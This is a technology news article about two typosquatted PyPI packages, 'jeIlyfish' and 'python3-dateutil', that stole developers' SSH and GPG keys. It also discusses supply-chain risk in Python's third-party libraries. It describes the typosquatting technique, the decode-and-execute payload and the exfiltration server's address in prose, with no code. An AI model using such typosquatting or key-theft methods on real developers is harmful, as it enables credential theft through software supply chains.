MITB Banner

Fake Third-Party Python Libraries Are Stealing Information, Is Python’s Popularity In Danger?

Share

Python

Python removed two fake libraries from Python Package Index (PyPI) after a German developer, Lukas Martini, reported about the packages stealing critical information. Python was released almost three decades ago, but it was only embraced in the last few years due to the increase in artificial intelligence and data science-based third-party libraries. 

However, these very libraries can become the prime reason for Python’s downfall. This is the third time Python org witnessed infiltration and extracting information — the other three occurred in July 2019, October 2018, and September 2017.

The Incident

Typosquatting – a form of cybersquatting technique that takes advantage typos made by users to hack into information – was used for deceiving and getting access to sensitive data. The idea behind such a technique is to register a look-alike name for the genuine package name, so that when a developer makes a typo he/she might import the phoney library instead of the desired one. As the fake library is designed to work as the genuine one, developers do not notice any discrepancies.

The two libraries were “jeIlyfish” and “python3-dateutil”, which resonate popular “jellyfish” and “dateutil” library. The fake “jeIlyfish” has a capital I instead of L and the “python3-dateutil” has extra word “ python3” in it. 

However, the malicious code was present in the ‘jeIlyfish’ and not in the ‘python3-dateutil’. The latter had imported the former in its Python file, thereby making ‘python3-dateutil’ malicious as well.

It was reported that, on implementation, the library downloaded a file named ‘hashsum’ that decodes into Python file and executes to exfiltrate SSH and GPG keys from developers computer. The stolen information was then sent to http://68.183.212.246:32258, including the list of repositories, home directory, PyCharm projects directory. 

On information from the developer on 1 December, Python removed the libraries to fortify further attack.

What Are Its Implications

Unlike other prominent programming languages, Python banks on third-party libraries. While this has helped Python to proliferate, it comes with a lot of security threat. When a developer installs a library, it usually contains modules from different vendors, and similarly, that module can further include packages from unknown sources. This can have a very long tail, as a result, evaluating can get tedious. 

Although before integrating any new libraries, Python organisation check for its trustworthiness but it cannot guarantee complete privacy due to its strenuous nature. Consequently, one can expect similar occurrences in the future as well.

Is There A Solutions

Python cannot follow the methodology of providing most of the libraries by itself, similar to what Google does for Android development. Data science and AI are vast, and Python organisation cannot keep up with the pace of the new developments that happen in the landscape.

And without the third-party libraries, Python will be similar to other programming languages in the data science and AI with limited capabilities for manipulating data.

Granting access to the third-party libraries with user permission can be a way forward, but will only solve a part of the problem as packages will still have access to numerous information. And manual checking of every imported library can be cumbersome to manage. 

Consequently, the restriction of permission to directories and manual checking still remains an ineffective solution.

Outlook

Third-party libraries were always a risk and developers in the past used to restrain themselves from embracing those libraries. But with the rising need for reusable code for quickly innovating in the AI landscape, it became the new normal. Therefore, the threat remains at least in libraries that are not popular among many developers.

Python cannot sustain without the third-party libraries, but it quickly needs to find a way out to determine malicious packages and protect developers from unknowingly adopting malevolent modules.

Share
Picture of Rohit Yadav

Rohit Yadav

Rohit is a technology journalist and technophile who likes to communicate the latest trends around cutting-edge technologies in a way that is straightforward to assimilate. In a nutshell, he is deciphering technology. Email: rohit.yadav@analyticsindiamag.com
Related Posts

CORPORATE TRAINING PROGRAMS ON GENERATIVE AI

Generative AI Skilling for Enterprises

Our customized corporate training program on Generative AI provides a unique opportunity to empower, retain, and advance your talent.

Upcoming Large format Conference

May 30 and 31, 2024 | 📍 Bangalore, India

Download the easiest way to
stay informed

Subscribe to The Belamy: Our Weekly Newsletter

Biggest AI stories, delivered to your inbox every week.

AI Courses & Careers

Become a Certified Generative AI Engineer

AI Forum for India

Our Discord Community for AI Ecosystem, In collaboration with NVIDIA. 

Flagship Events

Rising 2024 | DE&I in Tech Summit

April 4 and 5, 2024 | 📍 Hilton Convention Center, Manyata Tech Park, Bangalore

MachineCon GCC Summit 2024

June 28 2024 | 📍Bangalore, India

MachineCon USA 2024

26 July 2024 | 583 Park Avenue, New York

Cypher India 2024

September 25-27, 2024 | 📍Bangalore, India

Cypher USA 2024

Nov 21-22 2024 | 📍Santa Clara Convention Center, California, USA

Data Engineering Summit 2024

May 30 and 31, 2024 | 📍 Bangalore, India

Subscribe to Our Newsletter

The Belamy, our weekly Newsletter is a rage. Just enter your email below.